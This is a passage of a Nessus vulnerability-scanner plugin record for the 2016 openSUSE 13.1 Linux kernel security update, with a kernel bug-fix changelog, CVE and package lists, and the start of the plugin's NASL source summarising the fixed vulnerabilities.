hashed (bsc#949752).\n\n - dmapi: fix dm_open_by_handle_rvp taking an extra ref to mnt (bsc#967292).\n\n - drivers/base/memory.c: fix kernel warning during memory hotplug on ppc64 (bsc#963827).\n\n - drivers:hv: Allow for MMIO claims that span ACPI _CRS records (bnc#965924).\n\n - drivers:hv: Define the channel type for Hyper-V PCI Express pass-through (bnc#965924).\n\n - drivers:hv: Export a function that maps Linux CPU num onto Hyper-V proc num (bnc#965924).\n\n - drivers:hv: Export the API to invoke a hypercall on Hyper-V (bnc#965924).\n\n - drivers: hv: kvp: fix IP Failover.\n\n - drivers:pci:hv: New paravirtual PCI front-end for Hyper-V VMs (bnc#965924).\n\n - drivers: xen-blkfront: only talk_to_blkback() when in XenbusStateInitialising (bsc#957986 fate#320625).\n\n - driver: xen-blkfront: move talk_to_blkback to a more suitable place (bsc#957986 fate#320625).\n\n - drm/i915: do not warn if backlight unexpectedly enabled (boo#972068).\n\n - drm/i915: set backlight duty cycle after backlight enable for gen4 (boo#972780).\n\n - e1000e: Avoid divide by zero error (bsc#968643).\n\n - e1000e: fix division by zero on jumbo MTUs (bsc#968643).\n\n - e1000e: Fix tight loop implementation of systime read algorithm (bsc#968643).\n\n - fix: print ext4 mountopt data_err=abort correctly (bsc#969735).\n\n - fs/proc_namespace.c: simplify testing nsp and nsp->mnt_ns (bug#963960).\n\n - futex: Drop refcount if requeue_pi() acquired the rtmutex (bug#960174).\n\n - hv: Lock access to hyperv_mmio resource tree (bnc#965924).\n\n - hv: Make a function to free mmio regions through vmbus (bnc#965924).\n\n - hv: Reverse order of resources in hyperv_mmio (bnc#965924).\n\n - hv: Track allocations of children of hv_vmbus in private resource tree (bnc#965924).\n\n - hv: Use new vmbus_mmio_free() from client drivers (bnc#965924).\n\n - hwmon: (coretemp) Increase maximum core to 128 (bsc#970160)\n\n - ibmvnic: Fix ibmvnic_capability struct (fate#320253).\n\n - intel_pstate: Use del_timer_sync in intel_pstate_cpu_stop (bsc#967650).\n\n - ipv6: mld: fix add_grhead skb_over_panic for devs with large MTUs (bsc#956852).\n\n - kabi: Preserve checksum of kvm_x86_ops (bsc#969112).\n\n - kABI: protect enum enclosure_component_type.\n\n - kabi: protect struct acpi_processor signature (bsc#959463).\n\n - kABI: protect struct af_alg_type.\n\n - kABI: protect struct crypto_ahash.\n\n - kABI: protect struct dm_exception_store_type.\n\n - kABI: protect struct fib_nh_exception.\n\n - kABI: protect struct module.\n\n - kABI: protect struct rq.\n\n - kABI: protect struct sched_class.\n\n - kABI: protect struct scm_creds.\n\n - kABI: protect struct user_struct.\n\n - kabi/severities :\n\n - kabi/severities: Fail on changes in kvm_x86_ops, needed by lttng-modules\n\n - kgr: fix reversion of a patch already reverted by a replace_all patch (fate#313296).\n\n - kvm: SVM: add rdmsr support for AMD event registers (bsc#968448).\n\n - kvm: x86: Check dest_map->vector to match eoi signals for rtc (bsc#966471).\n\n - kvm: x86: Convert ioapic->rtc_status.dest_map to a struct (bsc#966471).\n\n - kvm: x86: store IOAPIC-handled vectors in each VCPU (bsc#966471).\n\n - kvm: x86: Track irq vectors in ioapic->rtc_status.dest_map (bsc#966471).\n\n - libceph: fix scatterlist last_piece calculation (bsc#963746).\n\n - lpfc: Fix kmalloc overflow in LPFC driver at large core count (bsc#969690).\n\n - memcg: do not hang on OOM when killed by userspace OOM access to memory reserves (bnc#969571).\n\n - mld, igmp: Fix reserved tailroom calculation (bsc#956852).\n\n - mmc: Exynos: Add module alias for dw mmc.\n\n - mvneta: fix per-cpu stats initialization.\n\n - namespaces: Re-introduce task_nsproxy() helper (bug#963960).\n\n - namespaces: Use task_lock and not rcu to protect nsproxy (bug#963960).\n\n - net: core: Correct an over-stringent device loop detection (bsc#945219).\n\n - net: irda: Fix use-after-free in irtty_open() (bnc#967903).\n\n - nfs4: treat lock owners as opaque values (bnc#968141).\n\n - nfs: Background flush should not be low priority (bsc#955308).\n\n - nfsd: fix nfsd_setattr return code for HSM (bsc#969992).\n\n - nfs: do not use STABLE writes during writeback (bnc#816099).\n\n - nfs: Fix handling of re-write-before-commit for mmapped NFS pages (bsc#964201).\n\n - nvme: default to 4k device page size (bsc#967047).\n\n - nvme: special case AEN requests (bsc#965087).\n\n - omap3isp: fix miscompile.\n\n - omap: Fix missing cm3xxx.h include.\n\n - omap: Fix missing usb.h include.\n\n - pci: Add global pci_lock_rescan_remove() (bnc#965924).\n\n - pci: allow access to VPD attributes with size 0 (bsc#959146).\n\n - pciback: Check PF instead of VF for PCI_COMMAND_MEMORY.\n\n - pciback: Save the number of MSI-X entries to be copied later.\n\n - pci: Blacklist vpd access for buggy devices (bsc#959146).\n\n - pci: Determine actual VPD size on first access (bsc#959146).\n\n - pci: Export symbols required for loadable host driver modules (bnc#965924).\n\n - pci: pciehp: Disable link notification across slot reset (bsc#967651).\n\n - pci: pciehp: Do not check adapter or latch status while disabling (bsc#967651).\n\n - pci: pciehp: Do not disable the link permanently during removal (bsc#967651).\n\n - pci: pciehp: Ensure very fast hotplug events are also processed (bsc#967651).\n\n - pci: Update VPD definitions (bsc#959146).\n\n - perf, nmi: Fix unknown NMI warning (bsc#968512).\n\n - power: Add _GLOBAL_TOC for 32bit.\n\n - proc: Fix ptrace-based permission checks for accessing task maps.\n\n - qla2xxx: Remove unavailable firmware files (bsc#943645).\n\n - rbd: do not log miscompare as an error (bsc#970062).\n\n - Refresh patches.drivers/0005-aacraid-MSI-x-support.patch.\n (boo#970249)\n\n - resources: Set type in __request_region() (bnc#965924).\n\n - Revert 'ipv6: tcp: add rcu locking in tcp_v6_send_synack()' (bnc#961257).\n\n - rpm/kernel-binary.spec.in: Sync the main and -base package dependencies (bsc#965830#c51).\n\n - rpm/kernel-module-subpackage: Fix obsoleting dropped flavors (bsc#968253)\n\n - sched: unbreak non-SMP build.\n\n - scsi_dh_alua: Do not block request queue if workqueue is active (bsc#960458).\n\n - scsi: fix soft lockup in scsi_remove_target() on module removal (bsc#965199).\n\n - scsi: proper state checking and module refcount handling in scsi_device_get (boo#966831).\n\n - series.conf: add section comments\n\n - supported.conf: Add e1000e (emulated by VMware) to -base (bsc#968074)\n\n - supported.conf: Add Hyper-V modules to -base (bsc#965830)\n\n - supported.conf: Add isofs to -base (bsc#969655).\n\n - supported.conf: Add more qemu device driver (bsc#968234)\n\n - supported.conf: Add mptspi and mptsas to -base (bsc#968206)\n\n - supported.conf: Add the qemu scsi driver (sym53c8xx) to\n -base (bsc#967802)\n\n - supported.conf: Add tulip to -base for Hyper-V (bsc#968234)\n\n - supported.conf: Add virtio-rng (bsc#966026)\n\n - supported.conf: Add xen-blkfront.\n\n - supported.conf: Add xfs to -base (bsc#965891)\n\n - supported.conf: Fix usb-common path usb-common moved to its own subdirectory in kernel v3.16, and we backported that change to SLE12.\n\n - sysctl: do not add hardlockup_all_cpu_backtrace sysctl on UP.\n\n - tcp: Restore RFC5961-compliant behavior for SYN packets (bsc#966864).\n\n - Update config files. Add new option CONFIG_PARAVIRT_XEN_BLKDEV_FRONTEND to i386 xen and ec2.\n\n - Update config files. Enable CONFIG_DEBUG_INFO for ec2 flavor. It's overriden on build anyway and having it disabled causes 'make silentoldconfig' checks fail because of new symbol CONFIG_DEBUG_INFO_REDUCED.\n\n - Update config files: enable CONFIG_PCI_HYPERV in non-SLE configs These are i386/* except xen, ec2 and vanilla and x86_64 desktop and trace.\n\n - Update config files: enable MACH_CUBOX in armv7hl/cubox\n\n - Update config files: ppc and ppc64 are big endian New config options (not existing in 13.1) need to be set accordingly.\n\n - Update patches.drivers/drm-ast-Initialize-data-needed-to-map-fb dev-memory.patch (bnc#880007). Fix refs and upstream status.\n\n - Update Xen config files (enable upstream block frontend).\n\n - Update Xen patches to 3.12.55.\n\n - USB: ehci-s5p: Fix phy reset.\n\n - usb: phy: Fix phy-samsung-usb when built as module.\n\n - usb: Quiet down false peer failure messages (bnc#960629).\n\n - x86: export x86_msi (bnc#965924).\n\n - xen: Add /etc/modprobe.d/50-xen.conf selecting Xen frontend driver implementation (bsc#957986, bsc#956084, bsc#961658).\n\n - xen-blkfront: allow building in our Xen environment (bsc#957986 fate#320625).\n\n - xen, blkfront: factor out flush-related checks from do_blkif_request() (bsc#957986 fate#320625).\n\n - xen-blkfront: fix accounting of reqs when migrating (bsc#957986 fate#320625).\n\n - xen/blkfront: Fix crash if backend does not follow the right states (bsc#957986 fate#320625).\n\n - xen-blkfront: improve aproximation of required grants per request (bsc#957986 fate#320625).\n\n - xen/blkfront: improve protection against issuing unsupported REQ_FUA (bsc#957986 fate#320625).\n\n - xen/blkfront: remove redundant flush_op (bsc#957986 fate#320625).\n\n - xen-blkfront: remove type check from blkfront_setup_discard (bsc#957986 fate#320625).\n\n - xen-blkfront: Silence pfn maybe-uninitialized warning (bsc#957986 fate#320625).\n\n - xen: fix blkfront and blkback build with normal xen.\n\n - xen-vscsi-large-requests: Fix resource collision for racing request maps and unmaps (bsc#966094).\n\n - xfs/dmapi: drop lock over synchronous XFS_SEND_DATA events (bsc#969993).\n\n - xfs/dmapi: propertly send postcreate event (bsc#967299).", "cvss3": {}, "published": "2016-04-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-2016-518)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8551", "CVE-2015-8552", "CVE-2015-8709", "CVE-2015-8785", "CVE-2015-8812", "CVE-2015-8816", "CVE-2016-0723", "CVE-2016-2143", "CVE-2016-2184", "CVE-2016-2384", "CVE-2016-2782", "CVE-2016-3139", "CVE-2016-3156"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debugsource", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debugsource", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:kernel-macros", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-pae", "p-cpe:/a:novell:opensuse:cloop-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-xen", "p-cpe:/a:novell:opensuse:cloop-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:crash", "p-cpe:/a:novell:opensuse:crash-debuginfo", "p-cpe:/a:novell:opensuse:crash-debugsource", "p-cpe:/a:novell:opensuse:crash-devel", "p-cpe:/a:novell:opensuse:crash-eppic", "p-cpe:/a:novell:opensuse:crash-eppic-debuginfo", "p-cpe:/a:novell:opensuse:crash-gcore", "p-cpe:/a:novell:opensuse:crash-gcore-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-default", "p-cpe:/a:novell:opensuse:crash-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-desktop", "p-cpe:/a:novell:opensuse:crash-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-pae", "p-cpe:/a:novell:opensuse:crash-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-xen", "p-cpe:/a:novell:opensuse:crash-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-debugsource", "p-cpe:/a:novell:opensuse:hdjmod-kmp-default", "p-cpe:/a:novell:opensuse:hdjmod-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop", "p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-kmp-pae", "p-cpe:/a:novell:opensuse:hdjmod-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-kmp-xen", "p-cpe:/a:novell:opensuse:hdjmod-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:ipset", "p-cpe:/a:novell:opensuse:kernel-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debugsource", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace-debugsource", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-debugsource", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:libipset3", "p-cpe:/a:novell:opensuse:libipset3-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper", "p-cpe:/a:novell:opensuse:ndiswrapper-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-debugsource", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch", "p-cpe:/a:novell:opensuse:openvswitch-controller", "p-cpe:/a:novell:opensuse:openvswitch-controller-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-debugsource", "p-cpe:/a:novell:opensuse:openvswitch-kmp-default", "p-cpe:/a:novell:opensuse:openvswitch-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-kmp-desktop", "p-cpe:/a:novell:opensuse:openvswitch-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-kmp-pae", "p-cpe:/a:novell:opensuse:openvswitch-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-kmp-xen", "p-cpe:/a:novell:opensuse:openvswitch-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-pki", "p-cpe:/a:novell:opensuse:openvswitch-switch", "p-cpe:/a:novell:opensuse:openvswitch-switch-debuginfo", "p-cpe:/a:novell:opensuse:openvswitch-test", "p-cpe:/a:novell:opensuse:pcfclock", "p-cpe:/a:novell:opensuse:pcfclock-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-debugsource", "p-cpe:/a:novell:opensuse:pcfclock-kmp-default", "p-cpe:/a:novell:opensuse:pcfclock-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop", "p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-kmp-pae", "p-cpe:/a:novell:opensuse:pcfclock-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:python-openvswitch", "p-cpe:/a:novell:opensuse:python-openvswitch-test", "p-cpe:/a:novell:opensuse:python-virtualbox", "p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-debugsource", "p-cpe:/a:novell:opensuse:vhba-kmp-default", "p-cpe:/a:novell:opensuse:vhba-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-desktop", "p-cpe:/a:novell:opensuse:vhba-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-pae", "p-cpe:/a:novell:opensuse:vhba-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-xen", "p-cpe:/a:novell:opensuse:vhba-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox", "p-cpe:/a:novell:opensuse:virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-debugsource", "p-cpe:/a:novell:opensuse:virtualbox-devel", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-source", "p-cpe:/a:novell:opensuse:virtualbox-qt", "p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-websrv", "p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:xen-debugsource", "p-cpe:/a:novell:opensuse:xen-devel", "p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:xen-kmp-default", "p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-desktop", "p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-pae", "p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:xen-libs-32bit", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools-domu", "p-cpe:/a:novell:opensuse:xen-tools-domu-debuginfo", "p-cpe:/a:novell:opensuse:xen-xend-tools", "p-cpe:/a:novell:opensuse:xen-xend-tools-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons", "p-cpe:/a:novell:opensuse:xtables-addons-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-debugsource", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-default", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen-debuginfo", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:ipset-debuginfo", "p-cpe:/a:novell:opensuse:ipset-debugsource", "p-cpe:/a:novell:opensuse:ipset-devel", "p-cpe:/a:novell:opensuse:ipset-kmp-default", "p-cpe:/a:novell:opensuse:ipset-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-desktop", "p-cpe:/a:novell:opensuse:ipset-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-pae", "p-cpe:/a:novell:opensuse:ipset-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-xen", "p-cpe:/a:novell:opensuse:ipset-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget", "p-cpe:/a:novell:opensuse:iscsitarget-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-debugsource", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-default", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:cloop", "p-cpe:/a:novell:opensuse:cloop-debuginfo", "p-cpe:/a:novell:opensuse:cloop-debugsource", "p-cpe:/a:novell:opensuse:cloop-kmp-default", "p-cpe:/a:novell:opensuse:cloop-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-desktop"], "id": "OPENSUSE-2016-518.NASL", "href": "https://www.tenable.com/plugins/nessus/90783", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-518.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90783);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-8551\", \"CVE-2015-8552\", \"CVE-2015-8709\", \"CVE-2015-8785\", \"CVE-2015-8812\", \"CVE-2015-8816\", \"CVE-2016-0723\", \"CVE-2016-2143\", \"CVE-2016-2184\", \"CVE-2016-2384\", \"CVE-2016-2782\", \"CVE-2016-3139\", \"CVE-2016-3156\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2016-518)\");\n script_summary(english:\"Check for the openSUSE-2016-518 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE 13.1 kernel was updated to 3.12.57 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2015-8785: The fuse_fill_write_pages function in\n fs/fuse/file.c in the Linux kernel allowed local users\n to cause a denial of service (infinite loop) via a\n writev system call that triggers a zero length for the\n first segment of an iov. (bsc#963765)\n\n - CVE-2015-8551: The PCI backend driver in Xen, when\n running on an x86 system and using Linux as the driver\n domain, allowed local guest administrators to hit BUG\n conditions and cause a denial of service (NULL pointer\n dereference and host OS crash) by leveraging a system\n with access to a passed-through MSI or MSI-X capable\n physical PCI device and a crafted sequence of\n XEN_PCI_OP_* operations, aka 'Linux pciback missing\n sanity checks (bnc#957990).\n\n - CVE-2015-8552: The PCI backend driver in Xen, when\n running on an x86 system and using Linux as the driver\n domain, allowed local guest administrators to generate a\n continuous stream of WARN messages and cause a denial of\n service (disk consumption) by leveraging a system with\n access to a passed-through MSI or MSI-X capable physical\n PCI device and XEN_PCI_OP_enable_msi operations, aka\n 'Linux pciback missing sanity checks (bnc#957990).\n\n - CVE-2015-8812: A flaw was found in the CXGB3 kernel\n driver when the network was considered congested. The\n kernel would incorrectly misinterpret the congestion as\n an error condition and incorrectly free/clean up the\n skb. When the device would then send the skb's queued,\n these structures would be referenced and may panic the\n system or allow an attacker to escalate privileges in a\n use-after-free scenario.(bsc#966437).\n\n - CVE-2015-8816: A malicious USB device could cause kernel\n crashes in the in hub_activate() function (bnc#968010).\n\n - CVE-2016-0723: Race condition in the tty_ioctl function\n in drivers/tty/tty_io.c in the Linux kernel allowed\n local users to obtain sensitive information from kernel\n memory or cause a denial of service (use-after-free and\n system crash) by making a TIOCGETD ioctl call during\n processing of a TIOCSETD ioctl call. (bsc#961500)\n\n - CVE-2016-2184: A malicious USB device could cause kernel\n crashes in the alsa usb-audio device driver\n (bsc#971125).\n\n - CVE-2016-2384: A double free on the ALSA umidi object\n was fixed. (bsc#966693).\n\n - CVE-2016-2782: A malicious USB device could cause kernel\n crashes in the visor device driver (bnc#968670).\n\n - CVE-2016-3139: A malicious USB device could cause kernel\n crashes in the wacom device driver (bnc#970909).\n\n - CVE-2016-3156: A quadratic algorithm could lead to long\n kernel ipv4 hangs when removing a device with a large\n number of addresses. (bsc#971360).\n\nThe following non-security bugs were fixed :\n\n - acl: Fix problem with setting ACL on directories\n (bsc#867251).\n\n - acpi / processor: Introduce apic_id in struct processor\n to save parsed APIC id (bsc#959463).\n\n - alsa: rawmidi: Make snd_rawmidi_transmit() race-free\n (bsc#968018).\n\n - alsa: seq: Fix leak of pool buffer at concurrent writes\n (bsc#968018).\n\n - arm: cubox: Add separate cubox configuration.\n\n - arm: xen: implement multicall hypercall support.\n\n - block: xen-blkfront: Fix possible NULL ptr dereference\n (bsc#957986 fate#320625).\n\n -\n btrfs-8394-qgroup-Account-data-space-in-more-proper-timi\n n.patch: (bsc#963193).\n\n - btrfs: Add handler for invalidate page (bsc#963193).\n\n - btrfs: check prepare_uptodate_page() error code earlier\n (bnc#966910).\n\n - btrfs: delayed_ref: Add new function to record reserved\n space into delayed ref (bsc#963193).\n\n - btrfs: delayed_ref: release and free qgroup reserved at\n proper timing (bsc#963193).\n\n - btrfs: extent_io: Introduce needed structure for\n recoding set/clear bits (bsc#963193).\n\n - btrfs: extent_io: Introduce new function\n clear_record_extent_bits() (bsc#963193).\n\n - btrfs: extent_io: Introduce new function\n set_record_extent_bits (bsc#963193).\n\n - btrfs: extent-tree: Add new version of\n btrfs_check_data_free_space and\n btrfs_free_reserved_data_space (bsc#963193).\n\n - btrfs: extent-tree: Add new version of\n btrfs_delalloc_reserve/release_space (bsc#963193).\n\n - btrfs: extent-tree: Switch to new check_data_free_space\n and free_reserved_data_space (bsc#963193).\n\n - btrfs: extent-tree: Switch to new delalloc space reserve\n and release (bsc#963193).\n\n - btrfs: fallocate: Add support to accurate qgroup reserve\n (bsc#963193).\n\n - btrfs: fix invalid page accesses in extent_same (dedup)\n ioctl (bnc#968230).\n\n - btrfs: fix page reading in extent_same ioctl leading to\n csum errors (bnc#968230).\n\n - btrfs: fix warning in backref walking (bnc#966278).\n\n - btrfs: qgroup: Add handler for NOCOW and inline\n (bsc#963193).\n\n - btrfs: qgroup: Add new trace point for qgroup data\n reserve (bsc#963193).\n\n - btrfs: qgroup: Avoid calling\n btrfs_free_reserved_data_space in clear_bit_hook\n (bsc#963193).\n\n - btrfs: qgroup: Check if qgroup reserved space leaked\n (bsc#963193).\n\n - btrfs: qgroup: Cleanup old inaccurate facilities\n (bsc#963193).\n\n - btrfs: qgroup: Fix a race in delayed_ref which leads to\n abort trans (bsc#963193).\n\n - btrfs: qgroup: Fix a rebase bug which will cause qgroup\n double free (bsc#963193).\n\n - btrfs: qgroup: Fix dead judgement on\n qgroup_rescan_leaf() return value (bsc#969439).\n\n - btrfs: qgroup: Introduce btrfs_qgroup_reserve_data\n function (bsc#963193).\n\n - btrfs: qgroup: Introduce functions to release/free\n qgroup reserve data space (bsc#963193).\n\n - btrfs: qgroup: Introduce new functions to reserve/free\n metadata (bsc#963193).\n\n - btrfs: qgroup: Use new metadata reservation\n (bsc#963193).\n\n - cpu: Provide smpboot_thread_init() on !CONFIG_SMP\n kernels as well.\n\n - dcache: use IS_ROOT to decide where dentry is hashed\n (bsc#949752).\n\n - dmapi: fix dm_open_by_handle_rvp taking an extra ref to\n mnt (bsc#967292).\n\n - drivers/base/memory.c: fix kernel warning during memory\n hotplug on ppc64 (bsc#963827).\n\n - drivers:hv: Allow for MMIO claims that span ACPI _CRS\n records (bnc#965924).\n\n - drivers:hv: Define the channel type for Hyper-V PCI\n Express pass-through (bnc#965924).\n\n 